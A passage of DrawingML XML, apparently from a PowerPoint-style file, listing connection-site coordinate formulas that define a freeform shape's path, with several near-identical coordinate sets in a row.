              <a:gd name="connsiteX62" fmla="*/ 200461 w 1463139"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 206334 w 1463139"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 187922 w 1463139"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 176658 w 1463139"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 178114 w 1463139"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 172979 w 1463139"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 133117 w 1463139"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 63642 w 1463139"/>
              <a:gd name="connsiteY69" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 27077 w 1463139"/>
              <a:gd name="connsiteY70" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 3584 w 1463139"/>
              <a:gd name="connsiteY71" fmla="*/ 224344 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 36757 w 1463139"/>
              <a:gd name="connsiteY72" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 75647 w 1463139"/>
              <a:gd name="connsiteY73" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 75647 w 1463139"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1463139 w 1463139"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1463139 w 1463139"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 199833 w 1463139"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 236426 w 1463139"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 247926 w 1463139"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 265333 w 1463139"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 276911 w 1463139"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 349754 w 1463139"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 365441 w 1463139"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 384281 w 1463139"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 372055 w 1463139"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 364713 w 1463139"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 363511 w 1463139"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 371096 w 1463139"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 401054 w 1463139"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 430852 w 1463139"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 444864 w 1463139"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 469295 w 1463139"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 506178 w 1463139"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 544559 w 1463139"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 550718 w 1463139"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 559000 w 1463139"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 562610 w 1463139"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 576476 w 1463139"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 579207 w 1463139"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 577465 w 1463139"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 584374 w 1463139"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 595633 w 1463139"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 601536 w 1463139"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 600849 w 1463139"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 592497 w 1463139"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 573150 w 1463139"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 574779 w 1463139"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 562479 w 1463139"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 562204 w 1463139"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 566503 w 1463139"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 576876 w 1463139"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 587772 w 1463139"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 595118 w 1463139"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 594414 w 1463139"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 597857 w 1463139"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 619287 w 1463139"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 601813 w 1463139"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 577221 w 1463139"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 562696 w 1463139"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 537870 w 1463139"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 495150 w 1463139"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 429402 w 1463139"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 400219 w 1463139"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 404289 w 1463139"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 372120 w 1463139"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 362007 w 1463139"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 346224 w 1463139"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 343682 w 1463139"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 344675 w 1463139"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 317659 w 1463139"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 294216 w 1463139"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 248015 w 1463139"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 219452 w 1463139"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 200247 w 1463139"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 206069 w 1463139"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 200461 w 1463139"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 206334 w 1463139"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 187922 w 1463139"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 176658 w 1463139"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 178114 w 1463139"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 172979 w 1463139"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 133117 w 1463139"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 60269 w 1463139"/>
              <a:gd name="connsiteY69" fmla="*/ 604703 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 27077 w 1463139"/>
              <a:gd name="connsiteY70" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 3584 w 1463139"/>
              <a:gd name="connsiteY71" fmla="*/ 224344 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 36757 w 1463139"/>
              <a:gd name="connsiteY72" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 75647 w 1463139"/>
              <a:gd name="connsiteY73" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 75647 w 1463139"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1463139 w 1463139"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1463139 w 1463139"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 199833 w 1463139"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 236426 w 1463139"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 247926 w 1463139"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 265333 w 1463139"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 276911 w 1463139"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 349754 w 1463139"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 365441 w 1463139"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 384281 w 1463139"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 372055 w 1463139"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 364713 w 1463139"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 363511 w 1463139"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 371096 w 1463139"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 401054 w 1463139"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 430852 w 1463139"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 444864 w 1463139"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 469295 w 1463139"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 506178 w 1463139"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 544559 w 1463139"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 550718 w 1463139"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 559000 w 1463139"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 562610 w 1463139"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 576476 w 1463139"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 579207 w 1463139"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 577465 w 1463139"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 584374 w 1463139"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 595633 w 1463139"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 601536 w 1463139"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 600849 w 1463139"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 592497 w 1463139"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 573150 w 1463139"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 574779 w 1463139"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 562479 w 1463139"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 562204 w 1463139"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 566503 w 1463139"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 576876 w 1463139"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 587772 w 1463139"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 595118 w 1463139"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 594414 w 1463139"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 597857 w 1463139"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 619287 w 1463139"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 601813 w 1463139"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 577221 w 1463139"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 562696 w 1463139"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 537870 w 1463139"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 495150 w 1463139"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 429402 w 1463139"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 400219 w 1463139"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 404289 w 1463139"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 372120 w 1463139"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 362007 w 1463139"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 346224 w 1463139"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 343682 w 1463139"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 344675 w 1463139"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 317659 w 1463139"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 294216 w 1463139"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 248015 w 1463139"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 219452 w 1463139"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 200247 w 1463139"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 206069 w 1463139"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 200461 w 1463139"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 206334 w 1463139"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 187922 w 1463139"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 176658 w 1463139"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 172979 w 1463139"/>
              <a:gd name="connsiteY66" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 133117 w 1463139"/>
              <a:gd name="connsiteY67" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 60269 w 1463139"/>
              <a:gd name="connsiteY68" fmla="*/ 604703 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 27077 w 1463139"/>
              <a:gd name="connsiteY69" fmla="*/ 455299 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 3584 w 1463139"/>
              <a:gd name="connsiteY70" fmla="*/ 224344 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 36757 w 1463139"/>
              <a:gd name="connsiteY71" fmla="*/ 74954 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 75647 w 1463139"/>
              <a:gd name="connsiteY72" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1596604"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1596604 w 1596604"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 333298 w 1596604"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 369891 w 1596604"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 381391 w 1596604"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 398798 w 1596604"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 410376 w 1596604"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 483219 w 1596604"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 498906 w 1596604"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 517746 w 1596604"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 505520 w 1596604"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 498178 w 1596604"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 496976 w 1596604"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 504561 w 1596604"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 534519 w 1596604"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 564317 w 1596604"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 578329 w 1596604"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 602760 w 1596604"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 639643 w 1596604"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 678024 w 1596604"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 684183 w 1596604"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 692465 w 1596604"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 696075 w 1596604"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 709941 w 1596604"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 712672 w 1596604"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 710930 w 1596604"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 717839 w 1596604"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 729098 w 1596604"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 735001 w 1596604"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 734314 w 1596604"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 725962 w 1596604"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 706615 w 1596604"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 708244 w 1596604"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 695944 w 1596604"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 695669 w 1596604"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 699968 w 1596604"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 710341 w 1596604"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 721237 w 1596604"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 728583 w 1596604"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 727879 w 1596604"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 731322 w 1596604"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 752752 w 1596604"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 735278 w 1596604"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 710686 w 1596604"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 696161 w 1596604"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 671335 w 1596604"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 628615 w 1596604"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 562867 w 1596604"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 533684 w 1596604"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 537754 w 1596604"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 505585 w 1596604"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 495472 w 1596604"/>
